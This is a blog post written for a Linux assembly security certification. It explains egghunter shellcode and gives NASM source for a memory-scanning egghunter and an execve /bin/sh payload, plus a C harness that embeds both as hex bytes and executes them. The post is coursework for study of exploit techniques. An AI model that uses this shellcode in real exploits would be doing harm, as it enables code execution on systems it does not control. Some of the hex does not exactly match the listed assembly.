SLAE Assignment 3: Egg Hunter Shellcode

03 May 2013

The third assignment for the SecurityTube Linux Assembly Expert exam was to explore egghunter shellcode. An egghunter is a two-stage shellcode which has one part random somewhere in memory and another part which gets executes and goes looking for the other part.Egghunting works by traversesing all of the memory and then executes the shellcode when it finds a certain pattern. I've made a list of resources where you can read up on egghunting, some of it is for Windows and others are for Linux. I've also written my own implementation which can be found below.

Information

Github Repository: https://github.com/cloud101/SLAE32/

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-251

Egg Hunting

Some interesting resources:

So what is egghunting? Egghunting is used when there isn't a lot of space for execution, as seen in the videos sometimes we need to use a two stage shellcode. The first stage is small and is only a helper in executing the shellcode. In the case of the egghunter, you place your shellcode somewhere in memory and you prepend it with a certain key (often a simple word). Your stager will just contain some code to go and look for the shellcode in memory, identify it by checking if the key is present and execute the code which comes after the key. Here is a video demoing how this works on Windows. I decided to base myself on the implementation used on exploit-db. The code is separated in 3 files, one which has the egghunter, one which has the shellcode prepended by the egg and a simple c program which makes a PoC. Let's start with the egghunter:

; Filename: egghunter.nasm
; Author:  Lucas Kauffman
; Purpose: Basic eggunter shellcode
;
global _start
section .text
_start:
        pop eax ; pop a random value into eax (whatever is on the stack)
_noEggs:
        inc eax
        cmp al, 0xf2 ; check if we can access the memory page or not.
        jz _noEggs ; if we can't access it, jump further
        cmp dword[eax-8], egg ; check if the 4-1 bytes preceding eax are containing w00t
        jne _noEggs
        cmp dword[eax-4], egg ; check if the 8-5 bytes preceding eax are containing w00t too.
        jne _noEggs
        jmp eax ; if the 8-5,4-1 bytes are preceeded by w00tw00t eax contains the first instruction
                ; of the shellcode. So we go down the rabbit hole and execute our shell
section .data
        egg equ "w00t" ; Keyword which is 4 bytes long.

I used the execve-stack code to spawn the shell. I added the keyword to the file:

; Filename: execve-stack-egghunter.nasm
; Author:  Lucas Kauffman
;
; Purpose: egghunter execve-stack
global _start
;tag word so our egghunter can find the shellcode
db "w00tw00t"
section .text
_start:
    ; PUSH the first null dword
    xor eax, eax
    push eax
    ; PUSH //bin/sh (8 bytes) 
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80

Our c program for the PoC:

char hunter[]= \
"\x58\x40\x3c\xf2\x74\xfb\x81\x78\xf8\x77\x30\x30\x74\x75\xf2\x81\x78\xfc\x77\x30\x30\x74\x75\xe9\xff\xe0";
char shellcode[] = \
/** first w00t **/
"\x77\x30\x30\x74"
/** second w00t **/
"\x77\x30\x30\x74"
/** shellcode generated from execve-stack-egghunter **/
"\x31\xc0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(){
     printf("Egghunter Length:  %d\n", strlen(hunter));
     printf("Shellcode Length:  %d\n", strlen(shellcode));
     (*(void  (*)()) hunter)();
     return 0;
}

We compile the code and execute the binary:

gcc egghunter.c -o egghunter.bin
./egghunter.bin

execute